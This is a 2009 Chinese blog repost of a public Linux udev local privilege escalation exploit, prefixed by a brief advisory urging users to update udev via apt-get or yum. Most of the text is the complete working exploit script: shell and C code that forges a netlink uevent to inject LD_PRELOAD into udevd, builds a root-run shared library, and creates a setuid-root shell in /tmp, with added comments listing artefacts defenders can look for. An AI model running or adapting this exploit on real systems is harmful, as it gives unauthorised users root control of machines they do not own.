
Linux本地提权漏洞Linux Kernel 2.6 UDEV Local Privilege Escalation Exploit

2009-04-25

Linux本地提权漏洞,对 RHEL 5.X x86和x64 以及 Debian 4.x 5.x x86和x64很有效,请尽快更新udev。

Linux的udev程序再爆本地提权漏洞,本地用户可以轻易获得root权限,请立即更新udev程序。(2.4内核系统不受影响)。修复方法(修复前请备份重要数据):

debian用户请执行apt-get update ; apt-get upgrade -y

centos用户请执行yum update udev

RedHat用户请使用官方rpm包更新或者购买RedHat的satellite服务。

Linux本地提权漏洞Linux Kernel 2.6 UDEV Local Privilege Escalation Exploit

#!/bin/sh
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique
# by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#
# WARNING: maybe needs some FIXUP to work flawlessly
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang
#
# NOTE(review): historical public PoC (milw0rm, 2009), kept verbatim; the
# annotations below describe what it does so the behaviour can be recognised
# and prevented, and do not correct the code.
# Steps: (1) build /tmp/udev, a C program that sends one forged "add" uevent
# for /dev/foo, with LD_PRELOAD=/tmp/libno_ex.so.1.0 as its last record, to
# the netlink peer whose pid is given as $1; (2) build /tmp/libno_ex.so.1.0,
# whose _init() runs "chown root:root /tmp/suid; chmod +s /tmp/suid";
# (3) build /tmp/suid, which calls setuid(0) and starts /bin/sh; (4) run
# /tmp/udev, which sleeps 10 s and then executes /tmp/suid.
# Defender notes: the remedy is the updated udev package named in the post
# above. Host artefacts: udev.c, program.c, program.o, suid.c and
# libno_ex.so.1.0 in the working directory; /tmp/udev, /tmp/suid and
# /tmp/libno_ex.so.1.0; a root-owned setuid binary under /tmp. Uevents
# normally originate from the kernel, so a userspace process sending on the
# NETLINK_KOBJECT_UEVENT family is suspect.

cat > udev.c << _EOF
/* Builds the forged uevent and sends it to the udevd netlink socket.
   Unchecked: argc (argv[1] is read unconditionally) and the return values
   of socket(), bind() and sendmsg(). */
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif

#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0

/* File-scope message state; sz is never used. */
int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;

/* Implicit int return type (pre-C99 style). argv[1] is the nl_pid to
   address, chosen as described in the script header; argc is not checked. */
main(int argc, char **argv) {
        char sysfspath[SHORT_STRING];
        char subsystem[SHORT_STRING];
        char event[SHORT_STRING];
        char major[SHORT_STRING];
        char minor[SHORT_STRING];

        /* Fixed uevent fields: an "add" of block device 8:1 at /dev/foo. */
        sprintf(event, "add");
        sprintf(subsystem, "block");
        sprintf(sysfspath, "/dev/foo");
        sprintf(major, "8");
        sprintf(minor, "1");

        /* The same address is used for bind() and as the send destination. */
        memset(&address, 0, sizeof(address));
        address.nl_family = AF_NETLINK;
        address.nl_pid = atoi(argv[1]);
        address.nl_groups = 0;

        msg.msg_name = (void*)&address;
        msg.msg_namelen = sizeof(address);
        msg.msg_iov = &iovector;
        msg.msg_iovlen = 1;

        socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
        bind(socket_fd, (struct sockaddr *) &address, sizeof(address));

        char message[LONG_STRING];
        char *mp;

        /* Payload laid out like a kernel uevent: "action@devpath" followed
           by NUL-terminated KEY=VALUE records (the +1 keeps each NUL). The
           last record injects LD_PRELOAD, which a vulnerable udevd
           presumably handed on to the helper programs it ran as root. */
        mp = message;
        mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
        mp += sprintf(mp, "ACTION=%s", event) +1;
        mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
        mp += sprintf(mp, "MAJOR=%s", major) +1;
        mp += sprintf(mp, "MINOR=%s", minor) +1;
        mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
        mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1;

        iovector.iov_base = (void*)message;
        iovector.iov_len = (int)(mp-message);

        /* buf and buflen are assigned but never used. */
        char *buf;
        int buflen;
        buf = (char *) &msg;
        buflen = (int)(mp-message);

        sendmsg(socket_fd, &msg, 0);

        close(socket_fd);

        /* Waits for udevd to act on the event, then runs /tmp/suid, which
           the preloaded library is expected to have made setuid root. */
 sleep(10);
 execl("/tmp/suid", "suid", (void*)0);
}

_EOF
gcc udev.c -o /tmp/udev
cat > program.c << _EOF
/* Shared object named in the LD_PRELOAD record above. Built with
   -nostartfiles (see the gcc line below), so _init presumably runs when the
   object is loaded. It removes LD_PRELOAD from the environment before exec
   so the shell it starts is not itself preloaded. */
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init()
{
 setgid(0);
 setuid(0);
 unsetenv("LD_PRELOAD");
 execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
}

_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cat > suid.c << _EOF
/* Shell launcher; relies on the setuid bit set by the library above.
   No headers are included (implicit declarations) and the execl argument
   list is terminated with the int 0 rather than a null pointer. */
int main(void) {
       setgid(0); setuid(0);
       execl("/bin/sh","sh",0); }
_EOF
gcc -o /tmp/suid suid.c
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
# $1 is passed through unvalidated; with no argument udev.c calls atoi(NULL).
/tmp/udev $1

milw0rm.com [2009-04-20]

本文标题:Linux本地提权漏洞Linux Kernel 2.6 UDEV Local Privilege Escalation Exploit
文章作者:夜火
发布时间:2009-04-25